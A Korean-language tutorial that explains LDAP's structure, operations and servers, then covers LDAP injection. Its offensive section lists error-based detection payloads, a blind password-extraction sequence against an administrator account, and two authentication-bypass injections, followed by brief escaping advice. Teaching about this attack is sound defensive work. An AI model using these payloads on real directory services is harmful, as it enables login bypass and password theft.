LDAP Injection
LDAP Injection
LDAP Injeciton은 LDAP(Lightweight Directory Access Protocol)에 대한 Injection 공격으로 사용자의 입력값이 LDAP Query에 직접 영향을 끼칠 수 있을 때 이를 통해 비정상적인 LDAP 동작을 유도하는 공격 방법이다. 보통의 Injection 취약점과 비슷하게 전반적인 공격 매커니즘은 SQL Injection 등 대다수 Injection 방식과 동일하다. LDAP Injection을 보기 전에 먼저 LDAP에 대해서 알아보자.
디렉토리 서비스
분산 환경에 있는 다중 시스템 및 서비스에 대한 자원 정보 저장소
해당 자원에 대한 클라이언트 및 서버 액세스를 제공
LDAP
네트워크상에서 조직이나 개인, 파일, 디바이스 등을 찾아볼 수 있게 해주는 소프트웨어 프로토콜
LDAP 이전에 디렉토리 서비스 표준인 X.500의 DAP가 존재했지만 OSI계층 전체의 프로토콜을 지원하고 통신 간에 네트워크 자원을 많이 소비하는 등 운영 환경에 제약이 많았다.
LDAP는 OSI계층 전체가 아닌 TCP/IP 위에서 운용되고 DAP의 스펙을 최대한 유지하되 경량화하여 네트워크의 부담을 줄이도록 설계했다.
LDAP 구조
LDAP의 구성 요소를 4가지 모델로 나누어 설명
1. Information 모델
데이터의 형태와 데이터를 통해 디렉토리 구조로 정보를 저장하는 방식에 관한 것이다.
LDAP 디렉토리에서 표현하는 정보 구조는 두 가지 요소로 이루어진다.
- Entry: 디렉토리에서 정보를 표현하는 기본 단위, Entry는 다수의 attribute로 구성
- Attribute: Entry의 각 타입을 저장하는 공간으로 1개의 Attribute에 하나, 또는 다수의 값을 담을 수 있다.
LDAP 디렉토리 구조는 Entry 데이터들을 트리 구조로 형성, 관리한다.
트리 형태의 구조를 DIT(Directory information Tree)라고 한다.
추가적으로 LDAP 디렉토리에서 데이터를 구성하는데 중요한 개념인 ObjectClass와 Schema에 대해 알아보자.
ObjectClass는 엔트리에서 꼭 필요하거나 가질 수 있는 Attribute 타입을 정의한다.
Entry를 만들 때 ObjectClass를 통해 데이터에 필수적으로 들어가야 하는 정보를 담을 수 있게 정의할 수 있다.
또한 ObjectClass는 다른 ObjectClass를 상속해 구현하며 개념을 확장할 수 있다.
Schema는 ObjectClass와 Attribute에 대해 정의하는 규칙으로 보면 된다.
ObjectClass에 어떤 Attribute가 들어갈지, Attribute의 값에 대한 제약 및 조건 등 관련된 규칙들을 정의할 수 있다.
스키마 정의를 통해 여러 응용 프로그램에서 디렉토리 서비스를 읽고 사용할 때 상호운용성을 보호해주는 역할을 한다.
2. Naming 모델
LDAP 디렉토리 구조에서 각 Entry를 어떻게 식별하고 구성하는지에 대해 설명한다.
Entry는 여러 자식 Entry들을 가지는 형태의 트리 구조로 나타나게 된다.
각 Entry 계층에서는 해당 계층을 나타내는 고유한 주소 Attribute를 지니는데 이를 RDN(Relative Distinguished Name)이라고 부른다.
앞 단락의 [LDAP 디렉토리 구조] 이미지에서 Entry 옆에 적힌 “OU=People”, “CN=Gerald Carter”와 같은 값은 해당 계층을 나타내는 고유한 주소 Attribute에 해당한다.
이렇게 트리 구조에서 각 Entry마다 존재하는 RDN 값들을 통해 원하는 경로에 있는 Entry 정보를 찾을 수 있다.
또한 경로 내 RDN값들을 이어 붙여 생성된 고유한 문자를 DN(Distinguished Name)이라고 부른다.
LDAP의 DIT 형태에서 가장 위에 존재하는 Entry는 DIT의 시작점, 데이터 트리의 루트로 보며 하나의 데이터셋으로 이해할 수 있다.
3. Functional 모델
LDAP 디렉토리에서 작업하는 명령을 다룬다.
8가지의 작업 명령을 보통 나누게 되고 작업 명령의 기능에 따라 3가지로 구분한다.
- 질문 작업
- Search: 주어진 조건에 맞는 Entry 도출
- Compare: 특정 Entry의 Attribute 값 비교
- 갱신 작업
- Add: 디렉토리에 신규 Entry 추가
- Delete: 디렉토리에 기존 Entry 삭제
- Modify: 디렉토리에 기존 Entry 수정 및 Entry DN값 변경
- 인증 및 제어 작업
- Bind: 디렉토리 서버 연결 시 사용자 인증
- Unbind: 디렉토리 서버와의 연결 해제
- Abandon: 이전 요청 명령을 취소
4. Security 모델
디렉토리에 접근하는 사용자 인증과 데이터 접근 권한을 통해 서비스를 보호하는 방식에 대해 설명한다.
SSL/TLS 인증 방식을 통해 서버-클라이언트 간 연결을 구성할 수 있으며 데이터 전송 시 바이너리 암호화를 적용해 정보를 보호한다.
LDAP v3 버전에서는 기존의 보안 방식뿐만 아니라 외부의 인증 방법을 제공할 수 있는 SASL 방식도 제공한다.
LDAP와 관계형 데이터베이스
LDAP을 이용한 디렉토리 서버도 데이터를 저장하는 데이터베이스의 유형 중 하나이다.
우리가 흔히 사용하는 MySQL, Oracle DB 같은 관계형 데이터베이스(RDB)와 비교했을 때 데이터 구조와 용도에서 많은 차이가 있다.
관계형 데이터베이스는 행과 열의 형태로 구성된 테이블에 데이터를 저장하고 서로 다른 테이블들과의 관계를 통해 결과를 도출한다.
반면 LDAP의 경우 데이터가 트리 구조로 이루어진 계층형 데이터베이스이다.
각 Entry는 Attribute로 이루어진 데이터들과 함께 하위에 여러 자식 Entry를 가지는 그룹 형태를 반복해 트리와 같은 계층 형태의 데이터로 표현할 수 있다.
LDAP이 가진 계층 구조는 검색과 읽기 작업에 더 큰 강점을 보여준다.
데이터가 위치한 계층에 접근해 필요한 데이터를 바로 꺼내 올 수 있고 해당 계층의 같은 성격을 가진 데이터의 속성과 스키마 설정을 통해 보다 상세히 비교할 수 있다.
이런 특징 때문에 검색 및 읽기 작업에서 관계형 데이터베이스보다 유리하다.
검색 및 읽기 처리 방식에도 차이가 있다.
LDAP은 저장된 데이터를 신속하게 조회하기 위해 단순 쿼리 위주로 작업을 처리한다.
하지만 관계형 데이터베이스는 여러 데이터, 테이블들의 관계를 통해 필요한 데이터를 종합적으로 가져오는 복합적 쿼리를 처리하는 작업에 중점을 둔다.
읽기와 달리 추가, 삭제와 같은 쓰기 작업에서는 관계형 데이터베이스보다 안정성이 떨어진다.
관계형 데이터베이스와 다르게 트랜잭션과 같은 유효성 검사가 제한적이기에 쓰기보다 읽기 작업이 많은 데이터 서비스에 주로 활용한다.
LDAP서버
LDAP을 통한 디렉토리 서비스가 다양하게 활용되는 만큼 LDAP와 관련된 다양한 서버들과 기업 솔루션이 존재한다.
또한 LDAP 서버를 관리하기 위한 다양한 클라이언트 API와 GUI 툴들이 등장하면서 선택의 폭이 넓어졌다.
디렉토리 서비스를 위한 LDAP 서버로 윈도우 서버 라이선스에 적용되는 Active Directory와 같은 상용 제품군부터 LDAP을 기반으로 한 오픈소스까지 다양하게 존재한다.
이들 중 많이 활용하는 서버 3종류는 다음과 같다.
1. OpenLDAP
- LDAP 디렉토리를 구축하고 관리할 수 있는 커맨드 라인 기반의 서버이다. LDAP이 개발되고 이를 활용하는 최초의 오픈소스 LDAP 서버로 지금까지 꾸준히 활용되고 있다. LDAP 기능만을 제공하고 있어 확장성이 뛰어나다.
2. Apache Directory Server
LDAP을 기반으로 자바로 작성된 LDAP 서버이다. 이클립스와 같은 자바 기반의 응용 프로그램에 쉽게 임베드 할 수 있는 장점이 있다. LDAP뿐만 아니라 DNS, Kerberos와 같은 다른 프로토콜들도 지원한다.
3. Active Directory
LDAP뿐만 아니라 다양한 형태의 디렉토리 구조 및 여러 프로토콜을 제공하는 솔루션이다. 기존 LDAP을 보다 확장해 다양한 기능을 제공할 뿐 아니라 서버 설정, 관리와 같은 전반적인 환경을 제어할 수 있는 GUI 서비스 및 툴들을 제공한다. 다만 다른 OpenLDAP 서버들과 달리 윈도우 환경에서만 서비스가 가능하다.
Offensive techniques
Detect
- Error base
Response 내 노출되는 에러를 통해 LDAP 구문의 일부가 노출되는 경우 LDAP Injection에 취약할 가능성이 높다. 공격자는 이 정보를 기반으로 LDAP Query를 유추하여 의도되지 않은 액션을 수행하도록 유도할 수 있다.
*
*)(&
*))%00
)(cn=))\\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
- Blind
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
(&(sn=administrator)(password=MY*)) : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK
Exploitation
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
user = admin)(!(&(1=0
pass = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
Defensive techniques
특수문자 Escape
아래 특수문자에 대해서 Escape 처리가 필요하다.
💡 * ( ) . & - _ [ ] backktick() ~ `` @ $ % ^ ? : { } ! '`
그리고 가능하다면 framework, library 등에서 제공하는 보안기능을 이용해 막는 것이 좋다.